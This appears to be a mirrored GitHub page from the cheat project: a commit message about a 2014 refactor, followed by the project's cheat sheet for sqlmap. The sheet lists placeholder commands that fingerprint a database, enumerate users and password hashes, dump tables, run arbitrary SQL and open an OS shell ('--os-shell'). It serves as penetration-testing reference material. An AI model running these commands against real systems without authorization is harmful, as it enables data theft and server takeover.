mirror of
https://github.com/cheat/cheat.git
synced 2024-12-18 18:55:06 +01:00
f46698b656
Performed an extensive refactoring on the entire application for the sake of code-cleanliness. - Refactored out of an ad-hoc Imperative paradigm into more of a functional/declarative paradigm. IMO, this makes the application signifcantly easier to understand. - Moved away from `argparse` and into `docopt` for argument parsing - Version bump to 2.0.0 - Performed extensive refactoring on the setup.py script. Script should install to the system more cleanly now. - Made minor formatting changes to the --list flag output - Updated the README Squashed commit of the following: commit e5681bd536aa0220cdeb7884cc248db55be408c9 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 23:30:21 2014 -0400 Fixed many bugs Everything seems to work now, I think. commit 764ec5950cee958eb1b8333ddfcb6bcd45c28429 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 21:51:31 2014 -0400 Restructuring for the sake of setup.py Seem to finally have a working install script commit 5a866c23857b77ec65070dd8023cd734f2b7c242 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 18:01:11 2014 -0400 Nits commit a79954ba5b33d992fa6a32abffb33b161d624e3d Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 17:53:03 2014 -0400 Implemented search commit b570a897e9a12c15affe1a72628deae31836dee2 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 17:11:27 2014 -0400 Nits commit 1a8d85b44457f1b2131b3e8475c5270b5d0899e3 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 17:02:22 2014 -0400 Still refactoring across files Trying to make the program structure clearer commit 34dffd6462e492e81ea558e2009a71051b7663c9 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 16:40:37 2014 -0400 Breaking app into several files This is for the sake of code-cleanliness commit 4825d678ff5f9817ccbf727ef71e5dea15ff2586 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 15:55:19 2014 -0400 Got syntax highlighting working commit c37d7a626d451bfca3d4a072eb9fed604085170f Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 15:29:22 2014 -0400 Reduced verbosity of function names commit 8e626045186b37dce2480f5af1994ddfa8db79b5 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 15:24:41 2014 -0400 Refactored argument passing Fewer arguments now need to be passed throughout the app. commit 807ba814650010b3dd1b59d27400b3fb4fcfede7 Author: Chris Lane <chris@chris-allen-lane.com> Date: Sat Apr 26 11:40:05 2014 -0400 Working through the refactor commit e34e6540d4f8cd727e98aac68289d515a02d5fe6 Author: Chris Lane <chris@chris-allen-lane.com> Date: Thu Apr 24 20:00:10 2014 -0400 Got a basic end-to-end refactor working Have re-implemented just the most basic functionality in the "cheat2" file.
46 lines
1.5 KiB
Plaintext
46 lines
1.5 KiB
Plaintext
# Test URL and POST data and return database banner (if possible)
|
|
./sqlmap.py --url="<url>" --data="<post-data>" --banner
|
|
|
|
# Parse request data and test | request data can be obtained with burp
|
|
./sqlmap.py -r <request-file> <options>
|
|
|
|
# Fingerprint | much more information than banner
|
|
./sqlmap.py -r <request-file> --fingerprint
|
|
|
|
# Get database username, name, and hostname
|
|
./sqlmap.py -r <request-file> --current-user --current-db --hostname
|
|
|
|
# Check if user is a database admin
|
|
./sqlmap.py -r <request-file> --is-dba
|
|
|
|
# Get database users and password hashes
|
|
./sqlmap.py -r <request-file> --users --passwords
|
|
|
|
# Enumerate databases
|
|
./sqlmap.py -r <request-file> --dbs
|
|
|
|
# List tables for one database
|
|
./sqlmap.py -r <request-file> -D <db-name> --tables
|
|
|
|
# Other database commands
|
|
./sqlmap.py -r <request-file> -D <db-name> --columns
|
|
--schema
|
|
--count
|
|
# Enumeration flags
|
|
./sqlmap.py -r <request-file> -D <db-name>
|
|
-T <tbl-name>
|
|
-C <col-name>
|
|
-U <user-name>
|
|
|
|
# Extract data
|
|
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump
|
|
|
|
# Execute SQL Query
|
|
./sqlmap.py -r <request-file> --sql-query="<sql-query>"
|
|
|
|
# Append/Prepend SQL Queries
|
|
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"
|
|
|
|
# Get backdoor access to sql server | can give shell access
|
|
./sqlmap.py -r <request-file> --os-shell
|